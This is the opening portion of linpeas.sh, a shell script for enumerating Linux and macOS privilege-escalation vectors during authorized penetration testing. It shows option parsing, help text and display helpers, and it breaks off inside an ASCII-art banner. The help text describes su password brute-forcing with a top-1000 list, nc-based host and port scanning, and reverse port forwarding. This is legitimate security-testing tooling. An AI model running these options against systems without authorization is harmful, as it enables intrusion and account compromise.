linpeas.sh (1144032B)
1 #!/bin/sh 2 VERSION="ng" 3 ADVISORY="This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission." 4 ########################################### 5 #-------) Checks pre-everything (---------# 6 ########################################### 7 if ([ -f /usr/bin/id ] && [ "$(/usr/bin/id -u)" -eq "0" ]) || [ "`whoami 2>/dev/null`" = "root" ]; then 8 IAMROOT="1" 9 MAXPATH_FIND_W="3" 10 else 11 IAMROOT="" 12 MAXPATH_FIND_W="7" 13 fi 14 ########################################### 15 #---------------) Colors (----------------# 16 ########################################### 17 C=$(printf '\033') 18 RED="${C}[1;31m" 19 SED_RED="${C}[1;31m&${C}[0m" 20 GREEN="${C}[1;32m" 21 SED_GREEN="${C}[1;32m&${C}[0m" 22 YELLOW="${C}[1;33m" 23 SED_YELLOW="${C}[1;33m&${C}[0m" 24 RED_YELLOW="${C}[1;31;103m" 25 SED_RED_YELLOW="${C}[1;31;103m&${C}[0m" 26 BLUE="${C}[1;34m" 27 SED_BLUE="${C}[1;34m&${C}[0m" 28 ITALIC_BLUE="${C}[1;34m${C}[3m" 29 LIGHT_MAGENTA="${C}[1;95m" 30 SED_LIGHT_MAGENTA="${C}[1;95m&${C}[0m" 31 LIGHT_CYAN="${C}[1;96m" 32 SED_LIGHT_CYAN="${C}[1;96m&${C}[0m" 33 LG="${C}[1;37m" #LightGray 34 SED_LG="${C}[1;37m&${C}[0m" 35 DG="${C}[1;90m" #DarkGray 36 SED_DG="${C}[1;90m&${C}[0m" 37 NC="${C}[0m" 38 UNDERLINED="${C}[5m" 39 ITALIC="${C}[3m" 40 ########################################### 41 #---------) Parsing parameters (----------# 42 ########################################### 43 # --) FAST - Do not check 1min of procceses and su brute 44 # --) SUPERFAST - FAST & do not search for special filaes in all the folders 45 if uname 2>/dev/null | grep -q 'Darwin' || /usr/bin/uname 2>/dev/null | grep -q 'Darwin'; then MACPEAS="1"; else MACPEAS=""; fi 46 FAST="1" #By default stealth/fast mode 47 SUPERFAST="" 48 DISCOVERY="" 49 PORTS="" 50 QUIET="" 51 CHECKS="system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_perms_files,interesting_files,api_keys_regex" 52 MITRE_FILTER="" 53 SEARCH_IN_FOLDER="" 54 ROOT_FOLDER="/" 55 WAIT="" 56 PASSWORD="" 57 NOCOLOR="" 58 DEBUG="" 59 AUTO_NETWORK_SCAN="" 60 EXTRA_CHECKS="" 61 REGEXES="" 62 PORT_FORWARD="" 63 NOT_CHECK_EXTERNAL_HOSTNAME="" 64 ONLINE_VULN_CHECKS="" 65 THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")" 66 [ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #If THREADS is not a number, put number 2 67 [ "$THREADS" -lt 1 ] 2>/dev/null && THREADS="2" #If THREADS is 0 or negative, put number 2 (avoids division-by-zero in eval_bckgrd) 68 HELP=$GREEN"Enumerate and search Privilege Escalation vectors. 69 ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors. 70 ${GREEN} Checks: 71 ${YELLOW} -a${BLUE} Perform all checks: 1 min of processes, su brute, and extra checks. 72 ${YELLOW} -o${BLUE} Only execute selected checks (system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_perms_files,interesting_files,api_keys_regex). Select a comma separated list. 73 ${YELLOW} -T${BLUE} Only execute checks matching the specified MITRE ATT&CK technique(s).$DG Ex: -T T1057,T1082$BLUE 74 ${YELLOW} -s${BLUE} Stealth & faster (don't check some time consuming checks) 75 ${YELLOW} -e${BLUE} Perform extra enumeration 76 ${YELLOW} -r${BLUE} Enable Regexes (this can take from some mins to hours) 77 ${YELLOW} -V${BLUE} Send package/kernel inventory to HackTricks for online vulnerability lookup 78 ${YELLOW} -P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' 79 ${YELLOW} -n${BLUE} Do not check hostname & IP in known malicious lists and leaks 80 ${YELLOW} -D${BLUE} Debug mode 81 ${GREEN} Network recon: 82 ${YELLOW} -t${BLUE} Automatic network scan - This option writes to files 83 ${YELLOW} -d <IP/NETMASK>${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 84 ${YELLOW} -p <PORT(s)> -d <IP/NETMASK>${BLUE} Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports.$DG Ex: -d 192.168.0.1/24 -p 53,139 85 ${YELLOW} -i <IP> [-p <PORT(s)>]${BLUE} Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 86 $GREEN Notice${BLUE} that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed 87 ${GREEN} Port forwarding (reverse connection): 88 ${YELLOW} -F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT${BLUE} Execute linpeas to forward a port from a your host (LOCAL_IP:LOCAL_PORT) to a remote IP (REMOTE_IP:REMOTE_PORT) 89 ${GREEN} Firmware recon: 90 ${YELLOW} -f </FOLDER/PATH>${BLUE} Execute linpeas to search passwords/file permissions misconfigs inside a folder 91 ${GREEN} Misc: 92 ${YELLOW} -h${BLUE} To show this message 93 ${YELLOW} -w${BLUE} Wait execution between big blocks of checks 94 ${YELLOW} -L${BLUE} Force linpeas execution 95 ${YELLOW} -M${BLUE} Force macpeas execution 96 ${YELLOW} -q${BLUE} Do not show banner 97 ${YELLOW} -N${BLUE} Do not use colours 98 ${YELLOW} -z <N>${BLUE} Set number of threads for background checks (default: auto-detected CPU count, fallback: 2; must be >= 1)$NC" 99 while getopts ":h?asd:p:i:P:qo:T:LMwNDterVf:F:z:" opt; do 100 case "$opt" in 101 h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;; 102 a) FAST="";EXTRA_CHECKS="1";ONLINE_VULN_CHECKS="1";; 103 s) SUPERFAST=1;; 104 d) DISCOVERY=$OPTARG;; 105 p) PORTS=$OPTARG;; 106 i) IP=$OPTARG;; 107 P) PASSWORD=$OPTARG;; 108 n) NOT_CHECK_EXTERNAL_HOSTNAME="1";; 109 q) QUIET=1;; 110 o) CHECKS=$OPTARG;; 111 T) MITRE_FILTER=$OPTARG;; 112 L) MACPEAS="";; 113 M) MACPEAS="1";; 114 w) WAIT=1;; 115 N) NOCOLOR="1";; 116 D) DEBUG="1";; 117 t) AUTO_NETWORK_SCAN="1";; 118 e) EXTRA_CHECKS="1";; 119 r) REGEXES="1";; 120 V) ONLINE_VULN_CHECKS="1";; 121 f) SEARCH_IN_FOLDER=$OPTARG; 122 if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then #Make sure firmware folder ends with "/" 123 SEARCH_IN_FOLDER="${SEARCH_IN_FOLDER}/"; 124 fi; 125 ROOT_FOLDER=$SEARCH_IN_FOLDER; 126 REGEXES="1"; 127 CHECKS="procs_crons_timers_srvcs_sockets,software_information,interesting_perms_files,interesting_files,api_keys_regex";; 128 F) PORT_FORWARD=$OPTARG;; 129 z) if [ "$OPTARG" -eq "$OPTARG" ] 2>/dev/null && [ "$OPTARG" -ge 1 ] 2>/dev/null; then THREADS=$OPTARG; else echo "WARNING: -z requires an integer >= 1, ignoring." >&2; fi;; 130 :) echo "ERROR: -$OPTARG requires an argument (e.g. -T T1082,T1552)" >&2; printf "%s\n\n" "$HELP$NC"; exit 1;; 131 *) echo "ERROR: Unknown option -$OPTARG" >&2; printf "%s\n\n" "$HELP$NC"; exit 1;; 132 esac 133 done 134 if [ "$MACPEAS" ]; then SCRIPTNAME="MacPEAS"; else SCRIPTNAME="LinPEAS"; fi 135 if [ "$NOCOLOR" ]; then 136 C="" 137 RED="" 138 SED_RED="&" 139 GREEN="" 140 SED_GREEN="&" 141 YELLOW="" 142 SED_YELLOW="&" 143 SED_RED_YELLOW="&" 144 BLUE="" 145 SED_BLUE="&" 146 ITALIC_BLUE="" 147 LIGHT_MAGENTA="" 148 SED_LIGHT_MAGENTA="&" 149 LIGHT_CYAN="" 150 SED_LIGHT_CYAN="&" 151 LG="" 152 SED_LG="&" 153 DG="" 154 SED_DG="&" 155 NC="" 156 UNDERLINED="" 157 ITALIC="" 158 fi 159 # test if sed supports -E or -r 160 E=E 161 echo | sed -${E} 's/o/a/' 2>/dev/null 162 if [ $? -ne 0 ] ; then 163 echo | sed -r 's/o/a/' 2>/dev/null 164 if [ $? -eq 0 ] ; then 165 E=r 166 else 167 echo "${YELLOW}WARNING: No suitable option found for extended regex with sed. Continuing but the results might be unreliable.${NC}" 168 fi 169 fi 170 # on macOS the built-in echo does not support -n, use /bin/echo instead 171 if [ "$MACPEAS" ] ; then alias echo=/bin/echo ; fi 172 print_title(){ 173 if [ "$DEBUG" ]; then 174 END_T1_TIME=$(date +%s 2>/dev/null) 175 if [ "$START_T1_TIME" ]; then 176 TOTAL_T1_TIME=$(($END_T1_TIME - $START_T1_TIME)) 177 printf $DG"This check took $TOTAL_T1_TIME seconds\n"$NC 178 fi 179 END_T1_TIME=$(date +%s 2>/dev/null) 180 if [ "$START_T1_TIME" ]; then 181 TOTAL_T1_TIME=$(($END_T1_TIME - $START_T1_TIME)) 182 printf $DG"The total section execution took $TOTAL_T1_TIME seconds\n"$NC 183 echo "" 184 fi 185 START_T1_TIME=$(date +%s 2>/dev/null) 186 fi 187 title=$1 188 title_len=$(echo $title | wc -c) 189 max_title_len=80 190 rest_len=$((($max_title_len - $title_len) / 2)) 191 printf "%s" "${BLUE}" 192 for i in $(seq 1 $rest_len); do printf " "; done 193 printf "╔" 194 for i in $(seq 1 $title_len); do printf "═"; done; printf "═"; 195 printf "╗" 196 echo "" 197 for i in $(seq 1 $rest_len); do printf "═"; done 198 printf "╣ $GREEN${title}${BLUE} ╠" 199 for i in $(seq 1 $rest_len); do printf "═"; done 200 echo "" 201 printf "%s" "${BLUE}" 202 for i in $(seq 1 $rest_len); do printf " "; done 203 printf "╚" 204 for i in $(seq 1 $title_len); do printf "═"; done; printf "═"; 205 printf "╝" 206 printf "%s" "${NC}" 207 echo "" 208 } 209 check_mitre_filter(){ 210 # $1 = comma-separated MITRE technique IDs for this check (e.g. "T1082,T1548.003") 211 # Returns 0 (run the check) when no filter is active OR when at least one ID matches. 212 # Parent filters match child techniques (e.g. T1552 matches T1552.001), 213 # but a child filter must not match a parent-only tag. 214 # Uses pure parameter-expansion loops — no subprocess forks, POSIX-compliant. 215 [ -z "$MITRE_FILTER" ] && return 0 216 _mitre_tags_left="$1," 217 while [ -n "$_mitre_tags_left" ]; do 218 _mitre_tag="${_mitre_tags_left%%,*}" 219 _mitre_tags_left="${_mitre_tags_left#*,}" 220 _mitre_base=${_mitre_tag%%.*} 221 _mitre_filters_left="$MITRE_FILTER," 222 while [ -n "$_mitre_filters_left" ]; do 223 _mitre_filter="${_mitre_filters_left%%,*}" 224 _mitre_filters_left="${_mitre_filters_left#*,}" 225 [ "$_mitre_filter" = "$_mitre_tag" ] && return 0 226 [ "$_mitre_filter" = "$_mitre_base" ] && return 0 227 done 228 done 229 return 1 230 } 231 print_2title(){ 232 if [ "$DEBUG" ]; then 233 END_T2_TIME=$(date +%s 2>/dev/null) 234 if [ "$START_T2_TIME" ]; then 235 TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) 236 printf $DG"This check took $TOTAL_T2_TIME seconds\n"$NC 237 echo "" 238 fi 239 START_T2_TIME=$(date +%s 2>/dev/null) 240 fi 241 if [ -n "$2" ]; then 242 printf ${BLUE}"╔══════════╣ $GREEN$1 ${DG}($2)\n"$NC #There are 10 "═" 243 else 244 printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC #There are 10 "═" 245 fi 246 } 247 print_3title(){ 248 if [ -n "$2" ]; then 249 printf ${BLUE}"══╣ $GREEN$1 ${DG}($2)\n"$NC #There are 2 "═" 250 else 251 printf ${BLUE}"══╣ $GREEN$1\n"$NC #There are 2 "═" 252 fi 253 } 254 print_3title_no_nl(){ 255 printf "\033[2K\r" 256 printf ${BLUE}"══╣ $GREEN${1}..."$NC #There are 2 "═" 257 } 258 eval_bckgrd(){ 259 eval "$1" & 260 CONT_THREADS=$(($CONT_THREADS+1)); if [ "$(($CONT_THREADS%$THREADS))" -eq "0" ]; then wait; fi 261 } 262 print_banner(){ 263 if [ "$MACPEAS" ]; then 264 bash -c "printf ' \e[38;5;238m▄\e[38;5;233m▄\e[38;5;235m▄\e[38;5;65m▄\e[48;5;239m\e[38;5;107m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;240m\e[38;5;65m▄\e[0m\e[38;5;237m▄\e[38;5;234m▄\e[38;5;233m▄\e[38;5;232m▄\e[38;5;239m▄\e[0m 265 \e[38;5;233m▄\e[38;5;246m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;71m \e[38;5;65m▄\e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m \e[48;5;65m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[0m\e[38;5;237m▄\e[38;5;234m▄\e[0m 266 \e[38;5;245m▄\e[38;5;233m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;239m\e[38;5;71m▄\e[48;5;71m \e[38;5;235m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;236m\e[38;5;64m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;2m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;2m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;232m\e[38;5;70m▄\e[48;5;234m\e[38;5;22m▄\e[48;5;65m\e[38;5;232m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m \e[48;5;237m\e[38;5;71m▄\e[48;5;236m\e[38;5;71m▄\e[0m\e[38;5;234m▄\e[38;5;238m▄\e[0m 267 \e[38;5;239m▄\e[38;5;233m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;238m\e[38;5;71m▄\e[48;5;71m \e[38;5;0m▄\e[48;5;236m\e[38;5;2m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m \e[38;5;70m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m \e[48;5;22m\e[38;5;76m▄\e[48;5;0m\e[38;5;76m▄\e[48;5;234m\e[38;5;64m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m \e[48;5;234m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[0m\e[38;5;234m▄\e[38;5;233m▄\e[0m 268 \e[38;5;233m▄\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;71m \e[38;5;235m▄\e[48;5;65m\e[38;5;235m▄\e[48;5;0m\e[38;5;255m▄\e[48;5;22m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;242m\e[38;5;15m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;254m\e[38;5;15m▄\e[48;5;15m \e[38;5;255m▄\e[48;5;255m\e[38;5;234m▄\e[48;5;248m\e[38;5;251m▄\e[48;5;240m\e[38;5;15m▄\e[48;5;237m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;64m\e[38;5;15m▄\e[48;5;70m\e[38;5;251m▄\e[48;5;76m\e[38;5;8m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;64m\e[38;5;70m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;238m\e[38;5;2m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m \e[48;5;237m\e[38;5;71m▄\e[0m 269 \e[38;5;233m▄\e[48;5;238m\e[38;5;71m▄\e[48;5;236m\e[38;5;71m▄\e[48;5;71m \e[38;5;65m▄\e[48;5;238m\e[38;5;234m▄\e[48;5;235m\e[38;5;255m▄\e[48;5;15m \e[38;5;233m▄\e[48;5;253m\e[38;5;0m▄\e[48;5;255m\e[38;5;232m▄\e[48;5;242m\e[38;5;238m▄\e[48;5;242m\e[38;5;233m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;255m▄\e[48;5;15m \e[48;5;255m\e[38;5;15m▄\e[48;5;145m\e[38;5;15m▄\e[48;5;237m\e[38;5;15m▄\e[48;5;22m\e[38;5;255m▄\e[48;5;70m\e[38;5;248m▄\e[48;5;234m\e[38;5;235m▄\e[48;5;234m\e[38;5;233m▄\e[48;5;71m\e[38;5;0m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m \e[0m 270 \e[48;5;71m \e[38;5;234m▄\e[48;5;233m\e[38;5;251m▄\e[48;5;255m\e[38;5;15m▄\e[48;5;15m \e[48;5;243m\e[38;5;235m▄\e[48;5;0m \e[38;5;243m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;15m \e[48;5;255m\e[38;5;15m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;232m\e[38;5;15m▄\e[48;5;235m\e[38;5;145m▄\e[48;5;71m\e[38;5;0m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;237m▄\e[0m 271 \e[48;5;71m \e[48;5;65m\e[38;5;232m▄\e[48;5;241m\e[38;5;15m▄\e[48;5;15m \e[48;5;236m\e[38;5;245m▄\e[48;5;0m \e[48;5;247m\e[38;5;232m▄\e[48;5;15m \e[48;5;247m\e[38;5;15m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m \e[48;5;237m\e[38;5;236m▄\e[0m 272 \e[48;5;71m \e[38;5;238m▄\e[48;5;234m\e[38;5;243m▄\e[48;5;253m\e[38;5;15m▄\e[48;5;15m \e[48;5;0m\e[38;5;7m▄\e[48;5;0m\e[38;5;239m▄\e[48;5;0m\e[38;5;102m▄\e[48;5;0m\e[38;5;234m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;252m▄\e[48;5;255m\e[38;5;15m▄\e[48;5;15m \e[48;5;239m\e[38;5;7m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m \e[0m 273 \e[48;5;71m \e[38;5;236m▄\e[48;5;234m\e[38;5;250m▄\e[48;5;15m \e[38;5;255m▄\e[48;5;15m\e[38;5;250m▄\e[48;5;15m\e[38;5;102m▄\e[48;5;15m\e[38;5;238m▄\e[48;5;15m\e[38;5;235m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;2m▄\e[48;5;255m\e[38;5;2m▄\e[48;5;255m\e[38;5;64m▄\e[48;5;254m\e[38;5;70m▄\e[48;5;188m\e[38;5;70m▄\e[48;5;253m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;15m\e[38;5;28m▄\e[48;5;15m\e[38;5;64m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;240m▄\e[48;5;15m\e[38;5;102m▄\e[48;5;15m\e[38;5;251m▄\e[48;5;15m\e[38;5;255m▄\e[48;5;15m \e[48;5;255m\e[38;5;15m▄\e[48;5;234m\e[38;5;235m▄\e[48;5;236m \e[0m 274 \e[48;5;71m \e[38;5;233m▄\e[48;5;232m\e[38;5;70m▄\e[48;5;238m\e[38;5;76m▄\e[48;5;65m\e[38;5;76m▄\e[48;5;236m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m \e[48;5;70m\e[38;5;76m▄\e[48;5;28m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;235m\e[38;5;76m▄\e[48;5;240m\e[38;5;76m▄\e[48;5;145m\e[38;5;76m▄\e[48;5;15m\e[38;5;28m▄\e[48;5;15m\e[38;5;235m▄\e[48;5;15m\e[38;5;240m▄\e[48;5;15m\e[38;5;145m▄\e[48;5;15m\e[38;5;254m▄\e[48;5;15m \e[48;5;242m\e[38;5;251m▄\e[48;5;236m\e[38;5;235m▄\e[0m 275 \e[48;5;65m\e[38;5;232m▄\e[48;5;235m\e[38;5;64m▄\e[48;5;70m \e[48;5;76m \e[48;5;2m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;242m\e[38;5;76m▄\e[48;5;254m\e[38;5;64m▄\e[48;5;15m\e[38;5;234m▄\e[48;5;15m\e[38;5;243m▄\e[48;5;15m\e[38;5;253m▄\e[48;5;15m \e[48;5;255m\e[38;5;15m▄\e[48;5;233m \e[0m 276 \e[48;5;232m \e[48;5;237m \e[48;5;70m \e[48;5;76m \e[38;5;70m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m \e[38;5;70m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;234m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m \e[48;5;28m\e[38;5;76m▄\e[48;5;235m\e[38;5;76m▄\e[48;5;102m\e[38;5;236m▄\e[48;5;250m\e[38;5;235m▄\e[48;5;233m\e[38;5;232m▄\e[0m 277 \e[48;5;232m \e[48;5;237m \e[48;5;70m \e[48;5;76m \e[48;5;70m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;233m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;76m \e[48;5;22m\e[38;5;76m▄\e[48;5;233m\e[38;5;76m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;28m\e[38;5;76m▄\e[48;5;76m \e[48;5;70m \e[48;5;236m \e[48;5;238m \e[48;5;236m\e[0m 278 \e[48;5;232m\e[38;5;236m▄\e[48;5;236m\e[38;5;233m▄\e[48;5;64m \e[48;5;76m \e[48;5;70m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;76m \e[38;5;64m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m \e[48;5;233m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m \e[48;5;64m \e[48;5;236m \e[38;5;235m▄\e[0m 279 \e[48;5;71m \e[48;5;232m\e[38;5;65m▄\e[48;5;64m\e[38;5;233m▄\e[48;5;76m \e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;76m\e[38;5;77m▄\e[48;5;76m \e[48;5;0m\e[38;5;70m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;70m▄\e[48;5;76m \e[38;5;77m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;77m▄\e[48;5;76m \e[38;5;70m▄\e[48;5;236m \e[48;5;237m\e[38;5;238m▄\e[48;5;234m\e[38;5;235m▄\e[0m 280 \e[48;5;71m \e[48;5;235m\e[38;5;71m▄\e[48;5;64m\e[38;5;232m▄\e[48;5;76m \e[48;5;77m\e[38;5;76m▄\e[48;5;107m\e[38;5;77m▄\e[48;5;107m \e[38;5;77m▄\e[48;5;77m \e[48;5;76m \e[48;5;107m\e[38;5;77m▄\e[48;5;107m \e[48;5;71m\e[38;5;77m▄\e[48;5;76m \e[48;5;64m \e[48;5;236m\e[38;5;237m▄\e[48;5;237m\e[38;5;234m▄\e[0m 281 \e[48;5;71m \e[48;5;232m\e[38;5;239m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m \e[48;5;70m\e[38;5;64m▄\e[48;5;237m\e[38;5;236m▄\e[48;5;238m\e[38;5;234m▄\e[48;5;235m\e[38;5;236m▄\e[0m 282 \e[48;5;71m \e[48;5;237m\e[38;5;71m▄\e[48;5;232m\e[38;5;235m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m \e[48;5;70m\e[38;5;236m▄\e[48;5;236m \e[48;5;237m\e[38;5;234m▄\e[48;5;235m\e[38;5;236m▄\e[0m 283 \e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m \e[48;5;236m\e[38;5;71m▄\e[48;5;232m\e[38;5;65m▄\e[48;5;70m\e[38;5;0m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m \e[38;5;22m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;70m\e[38;5;236m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m\e[38;5;233m▄\e[0m 284 \e[38;5;233m▀\e[48;5;71m\e[38;5;232m▄\e[48;5;71m \e[48;5;236m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;2m\e[38;5;235m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m \e[38;5;77m▄\e[48;5;76m\e[38;5;236m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;22m\e[38;5;238m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m \e[0m 285 \e[48;5;65m\e[38;5;238m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m \e[48;5;235m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;233m\e[38;5;238m▄\e[48;5;65m\e[38;5;234m▄\e[48;5;70m\e[38;5;232m▄\e[48;5;77m\e[38;5;0m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;235m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;65m▄\e[48;5;76m\e[38;5;65m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;234m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;237m\e[38;5;236m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m \e[38;5;65m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;237m▄\e[0m 286 \e[38;5;232m▀\e[48;5;65m\e[38;5;236m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m \e[48;5;65m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m \e[38;5;237m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;65m\e[38;5;8m▄\e[0m\e[38;5;234m▀\e[38;5;234m▀\e[38;5;239m▀\e[0m 287 \e[38;5;234m▀\e[38;5;236m▀\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m 